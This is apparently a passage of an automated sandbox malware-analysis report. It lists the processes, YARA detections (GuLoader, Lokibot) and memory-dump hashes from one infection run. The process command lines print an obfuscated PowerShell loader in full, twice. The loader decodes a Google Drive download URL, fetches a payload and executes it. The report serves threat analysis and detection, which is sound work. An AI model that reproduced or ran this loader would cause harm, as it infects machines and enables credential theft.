FramcT,lbao GraduR tatnAltastT ebo ') ;$Coadjuvant=$Knaldende[$Rytterskes];}$Woodlike=315055;$Bullwhack=31145;Romancerne (Stratocumulus ' Arre$CivilgQu lmlNonaroDrvblbArgota NicklDiato: CuddAResu aorbicbAc.ydnBlom i avyan redegUdf rsSyersdSl.vaaSkrupgVan,d Blind=Start JudypGKropsePerchtSyste-AmatoCLserfodriftnVo attDokkeeFo esnUafhnt Der A ilp$k nciaM talc MilioStraalKlageoHv.ragR,matyOvalt ');Romancerne (Stratocumulus 'Gemm $Magtsg ZigslE ecto BinobBlankaOver.l Admi:Sw,atRAfdriaDiscobGuardbSupe a urbunDek t Decen=Skovp nonco[XanthSTaiveyIndh sMag htMaskieM rphmScle . WaltCLystbo precnfrekvvGn ereSkolerUn.nstSagos].atte: Lo r: ForuF RetorSymbio DiscmintenBTho aaIncitsAfskyeHj.le6 Fris4Apo oSVi kstOve arManiciT stynElg,agIdent(Glaym$ProblA KaldaWars.b gglonCam,yiG,mminTilkogMaks sProtodN onfafo,hagOpsam)Dag e ');Romancerne (Stratocumulus ' airl$indkbgdiskulForfaounad b VskeaP.irelBon e:TidstVRefuta,lamenSkr.edbesvir RenseEnebonGymnadictereAdlum Recru=Musik Mucig[PruhbSDomsmyD censudelitWes ee HypsmSprog.KanceTIn bre Bengxna retRocke.InspiEMas,onFeedhcKly.koCarl,d S ori.nducn Hydrg B,mb]apach: peci:BardoA altrSNo seCUnencI,nfreIMungu. StruGLotife ,dedtElastSC eput Pro.rBesl iCen rnBlkhag arkk(Teist$ KimeR St aa enaebPattebUdgyda ArabnC.amo)ducki ');Romancerne (Stratocumulus 'Irkes$gldelgPla,dlDi,keolipizb Pha,aMidcalHypop:Pu poBFlyveoSoo lnEncykdTytteaosh obToteslF.rsyeTooth=Pr,gr$pls.bVBeda aB lignSu,dod CacorAsiateNightnMelandFlu reTi,ae.Sve,ssDevilu.innabBaadvsS ndit Strmr,elefiSkuepn GodkgElint(Upwro$C aisW DisaoE,plaosuperd planl BasiiParrok ommesub o, fami$EkvilBPast u FletlUnreslKultuwD.mmeh AftoaFu,iocSkadekDiddy)Tugte ');Romancerne $Bondable;"
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:01:42:53
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:01:43:07
                                      Start date:01/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? 
DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts ,all1Plad 2 sovs ');$Coadjuvant=$Knaldende[0];$Manius=(Stratocumulus 'Teena$ ind gIn ralIrrelOp.escB He mA EtioLJuece:R sikr Op aeTilluvVejskiCreagS BodeoColporIchthS Forl=UrtesnThefteChr mw Impu-S.ussoSlattbchookjUnderEHeretCSpidst all AgorsNon,rySpiseSRetirtCatchEAgnelmFilm,.AselanDutteeFo sttA tik. 
vampWSuperE BaghB KondCC nniLtele I TrkneI dkbnH perT Pelu ');Romancerne ($Manius);Romancerne (Stratocumulus ' angb$DimenR PrioeSigvav OptaiOpiops CitrobundprMachisUnfra.TekstH FlareRadiaaBrod.dV.rtueSeptorRotansMonst[Torso$FortaRSubtreDiscadAntiaaEncork UgektgrammiAdmonoAntednInte eNskesr SkarnPauseeudjaesEnam.]Ronni=omkla$ Me lTColore ivinrTor,hmFormioReak.mPro oeToba tNataleEtmaarGunl,e AmphtLap o ');$Controvert=Stratocumulus ' Nont$UnfriRMilite InstvRe,triO erssdext oDataerChangsReent.AnkylDTils oBrikewSilvan verhlFemteoBiparaSibildArb,jF U dei BflelWakekezooma(odont$StrknCVilfroBranda SkoldPreofjSpex u ikrv edlgan nignBissatl,sti,Frigi$DeviaaV.rboc.iltmo uperl Staao Dds gDull,yUtilb)Contr ';$acology=$Luksusvrelserne;Romancerne (Stratocumulus ' Aiga$StenvG PerclBesmioHder,BOp inA,nowcLSed m: FortpSme,trTeetiElungys T maCSkol,o,osprUIldsltCo fl=Vind (FernytPanorESkabmsC.elatAfdra-Lion pCorecaShtgoTNsk.rH Fe r este$Dro ea Anthc EgenO Pr,dlDestrOCove g HjneYTillb)C art ');while (!$prescout) {Romancerne (Stratocumulus 'Exsec$GobligJordtlSpec oPrincbCons aNyttelFrdse:Unkn kHyperoReg rm Di tpDolmaoTzolkn isbeeUnd rrLychee upersSwobb=wissi$LimintTill r OutsuAktioedivis ') ;Romancerne $Controvert;Romancerne (Stratocumulus 'pikemSReacttUr oma HandrBav etK,age- .tenSCachilCurbseSem.peuppilpFinge nexa4 Bota ');Romancerne (Stratocumulus 'Svars$Sud eg cephlG.aato HanebSa,meaSc.tul Frem:TraumpTablorHa mleFragmsDraw cHelseoUnferuRedcotMidda=Givab(,amplTN,nemeScytosKlaustImmor- P roP BuffaKommutUnpr,hUnsol Skum$QuickaNotomcP denoSynnvlst,ejohovedgDistoyArkip)Hand ') ;Romancerne (Stratocumulus 'Bugal$UudtmgBattllHindeo Ardub Ti laBoxinlTa kl:GrundRFyrr y S jutGritttSte,deE near Kvins UtchkSlaaeeInte sMidga= skad$Bort g By.tlSnur o Svagb.adroa jugulEx er:AandsFFloateAst,olOtocrtmanwiaGebrdrGruttbKomple H stjLapard phoveUncrar Magnn iffeeHel rs Meds+Falds+Tvege%Fejlr$havf KSchilnNarcoa nhealG vnldUnd reTond nShee,dRombeeKlokk. 
FramcT,lbao GraduR tatnAltastT ebo ') ;$Coadjuvant=$Knaldende[$Rytterskes];}$Woodlike=315055;$Bullwhack=31145;Romancerne (Stratocumulus ' Arre$CivilgQu lmlNonaroDrvblbArgota NicklDiato: CuddAResu aorbicbAc.ydnBlom i avyan redegUdf rsSyersdSl.vaaSkrupgVan,d Blind=Start JudypGKropsePerchtSyste-AmatoCLserfodriftnVo attDokkeeFo esnUafhnt Der A ilp$k nciaM talc MilioStraalKlageoHv.ragR,matyOvalt ');Romancerne (Stratocumulus 'Gemm $Magtsg ZigslE ecto BinobBlankaOver.l Admi:Sw,atRAfdriaDiscobGuardbSupe a urbunDek t Decen=Skovp nonco[XanthSTaiveyIndh sMag htMaskieM rphmScle . WaltCLystbo precnfrekvvGn ereSkolerUn.nstSagos].atte: Lo r: ForuF RetorSymbio DiscmintenBTho aaIncitsAfskyeHj.le6 Fris4Apo oSVi kstOve arManiciT stynElg,agIdent(Glaym$ProblA KaldaWars.b gglonCam,yiG,mminTilkogMaks sProtodN onfafo,hagOpsam)Dag e ');Romancerne (Stratocumulus ' airl$indkbgdiskulForfaounad b VskeaP.irelBon e:TidstVRefuta,lamenSkr.edbesvir RenseEnebonGymnadictereAdlum Recru=Musik Mucig[PruhbSDomsmyD censudelitWes ee HypsmSprog.KanceTIn bre Bengxna retRocke.InspiEMas,onFeedhcKly.koCarl,d S ori.nducn Hydrg B,mb]apach: peci:BardoA altrSNo seCUnencI,nfreIMungu. StruGLotife ,dedtElastSC eput Pro.rBesl iCen rnBlkhag arkk(Teist$ KimeR St aa enaebPattebUdgyda ArabnC.amo)ducki ');Romancerne (Stratocumulus 'Irkes$gldelgPla,dlDi,keolipizb Pha,aMidcalHypop:Pu poBFlyveoSoo lnEncykdTytteaosh obToteslF.rsyeTooth=Pr,gr$pls.bVBeda aB lignSu,dod CacorAsiateNightnMelandFlu reTi,ae.Sve,ssDevilu.innabBaadvsS ndit Strmr,elefiSkuepn GodkgElint(Upwro$C aisW DisaoE,plaosuperd planl BasiiParrok ommesub o, fami$EkvilBPast u FletlUnreslKultuwD.mmeh AftoaFu,iocSkadekDiddy)Tugte ');Romancerne $Bondable;"
                                      Imagebase:0x150000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.3056701550.00000000083B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.3043556156.0000000005624000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.3057467096.0000000009F62000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:01:43:07
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:01:43:23
                                      Start date:01/10/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                                      Imagebase:0xea0000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Reset < >
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15c9fcc2e340bf5e2dffdf6d4af478417ccf22419556d0f4b8a90d8e419611e2
                                        • Instruction ID: 65fde406b8c84b44f1b3e6fca4fe9cdc3b899906a8652444314ca1de6e53254d
                                        • Opcode Fuzzy Hash: 15c9fcc2e340bf5e2dffdf6d4af478417ccf22419556d0f4b8a90d8e419611e2
                                        • Instruction Fuzzy Hash: 86F1A23090DA8D8FEBA8EF28C8557E937E1FF54354F04426EE84DC7295CB34A9458B86
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 285a891cb801a79bfbdbd6fd0368900552f72c364837f5757c619a58ea9ca15e
                                        • Instruction ID: d50e6587eb61582dec8ca70ca7b272494924315776ee3902905667654386c10a
                                        • Opcode Fuzzy Hash: 285a891cb801a79bfbdbd6fd0368900552f72c364837f5757c619a58ea9ca15e
                                        • Instruction Fuzzy Hash: 19E1C270A0DA8E8FEBA8EF28C8557E937D1FB54350F04426EE84DC7291DB34A9448B85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @_H
                                        • API String ID: 0-518063247
                                        • Opcode ID: 1fe5a5a58a4f3cd9c05051374129221db3f13854bbd03de381e60ba4927b3402
                                        • Instruction ID: 26d3934c4d3172db12d7c5cee3a06727a10667a38b38cd16e1d90a2cb9645232
                                        • Opcode Fuzzy Hash: 1fe5a5a58a4f3cd9c05051374129221db3f13854bbd03de381e60ba4927b3402
                                        • Instruction Fuzzy Hash: C7811631F0DE8A4FEB95AA2858586B97BE1FF65390F8801BAD41DD3193DE28BC04C355
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b37d97d5e2301e66398c04b38335617a786a3e7a0dad65ceab294ff07ada187f
                                        • Instruction ID: 86d3d4ddea6e6aa91083eb12599d67f4e95aa968a31724b038ccfecfa16d4c55
                                        • Opcode Fuzzy Hash: b37d97d5e2301e66398c04b38335617a786a3e7a0dad65ceab294ff07ada187f
                                        • Instruction Fuzzy Hash: 5BE16E30A1DA4D8FDF88EF58C495BA97BE1FFA8344F14016AE409D7295CB74E885CB81
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 645d1f72d1548c29f6a446d52951894ec36647bf81287854e796c645bedab676
                                        • Instruction ID: a0159006ab99e62195725765430683634f71345748cb90984d947c0db36e4e85
                                        • Opcode Fuzzy Hash: 645d1f72d1548c29f6a446d52951894ec36647bf81287854e796c645bedab676
                                        • Instruction Fuzzy Hash: EC322531E0DA8A4FE7A5A62C5C593B57BD1FF56260F8802BAC04DD7193DF29BC068385
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1409143514d32c1febb9dbdc1b299f5dd42fb3a007c7acf28d7bfc5075481e93
                                        • Instruction ID: 8905480e3874ea582cac1e3b54f56098a128e3c65b42f7ceb48bd9cc62dbdc5e
                                        • Opcode Fuzzy Hash: 1409143514d32c1febb9dbdc1b299f5dd42fb3a007c7acf28d7bfc5075481e93
                                        • Instruction Fuzzy Hash: 90220031D0EBC65FE756AB3848652747BA1FF17290F5901FAC088DB1E3DE28A806C356
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47bac46262929228b22b1fdf31ecee0c04a87852a112fa667d532766fbd2cb46
                                        • Instruction ID: 280553ca2ba3b8068e912673b87b1d14523334c1da48893e5536c61919726f5d
                                        • Opcode Fuzzy Hash: 47bac46262929228b22b1fdf31ecee0c04a87852a112fa667d532766fbd2cb46
                                        • Instruction Fuzzy Hash: A8F1C130A1DA498FDB98EF1CC495AA97BF1FF68344F14417AD409D7296CB34E886CB81
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b953c825300d35afdd65a8dce87946f55b15eb999ea003cc9bbdefb162c9576
                                        • Instruction ID: 5e8939e908a90be4698eb3a5252a26135a7b27d9a05790c90a68f639d77f4c76
                                        • Opcode Fuzzy Hash: 0b953c825300d35afdd65a8dce87946f55b15eb999ea003cc9bbdefb162c9576
                                        • Instruction Fuzzy Hash: 3FF12331E0EAC54FE796AB2848652787BE1FF56690F4900FEC14CD71D3DE28AC498356
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8a62503f063a07a093f0aab78bcd045033114b711b0b6f1fa19984ee0aac2d4
                                        • Instruction ID: 5668be925b36e9dd2403a36d2273f1bda3b6172052b558cb55f2f52a797eec9f
                                        • Opcode Fuzzy Hash: b8a62503f063a07a093f0aab78bcd045033114b711b0b6f1fa19984ee0aac2d4
                                        • Instruction Fuzzy Hash: C5E12131E0EA865FE799EB2858542787BE2FF56690F4800FEC04DD71C3DE28AC958356
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39f23c04403d7d19d5f07d0feec96eb007e8b2c1b2566e17a75d0a844877fbfa
                                        • Instruction ID: ed4952b62fa4c203c669c0b7d2e6db425385a8f9a13f1eab0d5c0fe4f3059337
                                        • Opcode Fuzzy Hash: 39f23c04403d7d19d5f07d0feec96eb007e8b2c1b2566e17a75d0a844877fbfa
                                        • Instruction Fuzzy Hash: 56B14832E1EA8A4FE799A62C58591793BD1FF522A4F8801BED44DD30D3DF28BC058356
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1439865b4595790db86969322cbfd93711d15f5da2fb5007d4883b43859a07fd
                                        • Instruction ID: f04353d4eadb697377b67a9302c9d07222901dff9aa276d2d0838978e96c91c7
                                        • Opcode Fuzzy Hash: 1439865b4595790db86969322cbfd93711d15f5da2fb5007d4883b43859a07fd
                                        • Instruction Fuzzy Hash: 28A1713050DA4D8FEBA8EF28D8557F937E1EF59350F00416EE84DC7292CB3499458B86
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63e281d05d489ba194ce60e481c9cce1fa54416acf2b94946f20e19cf75d768f
                                        • Instruction ID: 8273b1c9737a337afabad44f93edf93b2c30d8b07561708ed9dc4697a9f2b948
                                        • Opcode Fuzzy Hash: 63e281d05d489ba194ce60e481c9cce1fa54416acf2b94946f20e19cf75d768f
                                        • Instruction Fuzzy Hash: 1E31043161DA098FEB88EA1CC445A7577E1FB99315F10057ED48AC3266DB22F846C781
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1dc5cc9a774274b07a01e72d17437beb1dc194fb7dcd0f0c745c53e9ecf66b44
                                        • Instruction ID: 44e0fb929109f0e95bab409df44e0c52164eb686d93e0c64d2be58dd1984d0c4
                                        • Opcode Fuzzy Hash: 1dc5cc9a774274b07a01e72d17437beb1dc194fb7dcd0f0c745c53e9ecf66b44
                                        • Instruction Fuzzy Hash: 6531F621E1FA870FE7A5A628181517C6AD1FF657A0F8801BAD42EE31D3DF2C7C00C21A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e52c4723fed5740e6194edb483a4125c70bf5a2385d488329d94c61e2480ea81
                                        • Instruction ID: 7501d233dfe9cda9346941073701b3105ba8621a3c36d3d47a32f98e7781b182
                                        • Opcode Fuzzy Hash: e52c4723fed5740e6194edb483a4125c70bf5a2385d488329d94c61e2480ea81
                                        • Instruction Fuzzy Hash: 0521F631E1EA864FE3A9A62C144527966D2FF522A8FC801BAD41DD71D3DF28BC45820A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dccf8fd5683d8d200ef1c940ffa67e28e4c6e3bf96d2c8b9129ab1f5866f2888
                                        • Instruction ID: 836b30f7567a1bb19ee41150efbfaf0ee1525a5fb806aba2c03e84adee3996b3
                                        • Opcode Fuzzy Hash: dccf8fd5683d8d200ef1c940ffa67e28e4c6e3bf96d2c8b9129ab1f5866f2888
                                        • Instruction Fuzzy Hash: 9931273081E65E8EFBB4AF24CC1ABFA3290FF45399F410639D40D87092DB786989CA15
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 836a6f9a3a512731fcb2670d2969255cdcf4b80b47688c07f76a9b3ef9568307
                                        • Instruction ID: 9dbe626a21b5b075ccc48dd7c8370160cbfe79be7e0c68a7721cd58ebaf35762
                                        • Opcode Fuzzy Hash: 836a6f9a3a512731fcb2670d2969255cdcf4b80b47688c07f76a9b3ef9568307
                                        • Instruction Fuzzy Hash: 27210422E0EAC69FF396A23C68151742BD1EF56690F4945FAC049D71D3CD2D9C498326
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2281702562.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848d90000_powershell.jbxd
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2282123839.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3029552550.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2cc0000_powershell.jbxd
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.3028020701.000000000299D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0299D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_299d000_powershell.jbxd